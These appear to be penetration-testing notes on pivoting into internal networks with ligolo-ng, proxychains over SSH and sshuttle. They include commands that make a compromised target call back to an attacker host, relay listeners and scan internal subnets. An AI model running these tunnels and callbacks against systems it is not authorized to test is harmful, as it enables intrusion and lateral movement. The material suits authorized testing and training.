
Pivoting

LigoloNG


https://github.com/Nicocha30/ligolo-ng

Single pivot

Attack host:

sudo ip tuntap add user kali mode tun ligolo ; sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:443
Add a route to the new subnet:
sudo ip route add 172.16.139.0/24 dev ligolo
Target:
agent.exe -connect <attackIP>:443 -ignore-cert
Attack host: select session
session
Add listeners:
listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:80
listener_add --addr 0.0.0.0:8081 --to 127.0.0.1:81
listener_add --addr 0.0.0.0:8082 --to 127.0.0.1:82
listener_add --addr 0.0.0.0:8083 --to 127.0.0.1:83
listener_add --addr 0.0.0.0:8084 --to 127.0.0.1:84
Start the tunnel:
start

Double Pivot

Attack host:

sudo ip tuntap add user kali mode tun double ; sudo ip link set double up
sudo ip tuntap add user kali mode tun ligolo ; sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:443
Target: First pivot callback
agent.exe -connect <attackIP>:443 -ignore-cert
Attack host: Add routes
sudo ip route add 172.16.139.0/24 dev ligolo
sudo ip route add 172.16.210.0/24 dev double
Select the session:
session
Add a listener for the second pivot (the second agent connects to the first pivot host on 139, which is relayed to the proxy on 443):
listener_add --addr 0.0.0.0:139 --to 127.0.0.1:443
Add the normal listeners:
listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:80
listener_add --addr 0.0.0.0:8081 --to 127.0.0.1:81
listener_add --addr 0.0.0.0:8082 --to 127.0.0.1:82
listener_add --addr 0.0.0.0:8083 --to 127.0.0.1:83
listener_add --addr 0.0.0.0:8084 --to 127.0.0.1:84
Start the first tunnel:
start
Second target: Call back to first pivot host from second
agent.exe -connect <targetONE>:139 -ignore-cert
Add listeners on the second host:
listener_add --addr 0.0.0.0:5050 --to 127.0.0.1:50
listener_add --addr 0.0.0.0:5051 --to 127.0.0.1:51
listener_add --addr 0.0.0.0:5052 --to 127.0.0.1:52
listener_add --addr 0.0.0.0:5053 --to 127.0.0.1:53
listener_add --addr 0.0.0.0:5054 --to 127.0.0.1:54
Start the second tunnel on the second tun interface:
start --tun double
Verify access:
nxc smb 172.16.139.10/24 
nxc smb 172.16.210.0/24

proxychains (with SOCKS tunnel)


Start with a dynamic SSH port forward:

ssh -D 9050 user@<jumpIP>
Check the proxychains configuration:
cat /etc/proxychains.conf
or
cat /etc/proxychains4.conf
Ensure it's configured to route over the local dynamic forward on port 9050 (the last line of the ProxyList):
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 9050
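A small check for that step, added here as an example and not part of the original page: it parses a proxychains config, prints the active (non-comment) ProxyList entries, and confirms that one of them is a SOCKS proxy at 127.0.0.1:9050. The sample config below is constructed to mimic the tail of a stock proxychains4.conf; point it at /etc/proxychains4.conf on a real host.

```shell
#!/bin/sh
# Added example (not from the original page). Inspects a proxychains config and
# reports whether the active ProxyList routes through the local SSH dynamic
# forward. The config content below is constructed for the demo.

sample_conf="$(mktemp)"
cat > "$sample_conf" <<'EOF'
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 9050
EOF

# Print the active (non-comment, non-blank) lines that follow [ProxyList].
active_proxies() {
    awk '/^\[ProxyList\]/ {in_list=1; next}
         in_list && $0 !~ /^[[:space:]]*(#|$)/ {print}' "$1"
}

# Exit 0 if some active entry is socks4/socks5 at the given host and port.
uses_local_forward() {
    active_proxies "$1" | awk -v host="$2" -v port="$3" '
        ($1 == "socks4" || $1 == "socks5") && $2 == host && $3 == port {found = 1}
        END {exit !found}'
}

echo "Active proxies:"
active_proxies "$sample_conf"
if uses_local_forward "$sample_conf" 127.0.0.1 9050; then
    echo "OK: proxychains routes via 127.0.0.1:9050"
else
    echo "WARNING: no SOCKS entry for 127.0.0.1:9050; traffic would not use the forward"
fi
rm -f "$sample_conf"
```

Note that the stock file's tor default happens to use the same 127.0.0.1:9050, so the check passes on an untouched config as long as nothing else has edited the ProxyList; if the dynamic forward was started on a different port, pass that port instead.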
Prepend proxychains (or proxychains4) to any command to tunnel its traffic:
proxychains nmap
proxychains msfconsole
proxychains firefox

Only a full TCP connect scan works over proxychains. Proxychains cannot handle partial packets, so half-open (SYN) scans return incorrect results.

proxychains nmap -v -Pn -sT <internalIP>

sshuttle


https://github.com/sshuttle/sshuttle

Specify the -r option to connect to the remote machine with a username and password, followed by the network or IP range we want to route through it:

sudo sshuttle -r user@<jumpHost> 172.16.5.0/23 -v 
sshuttle creates iptables entries that redirect all traffic to the 172.16.5.0/23 network through the pivot host, so any tool can be used directly without proxychains:
nmap -v -sV 172.16.5.19 -A -Pn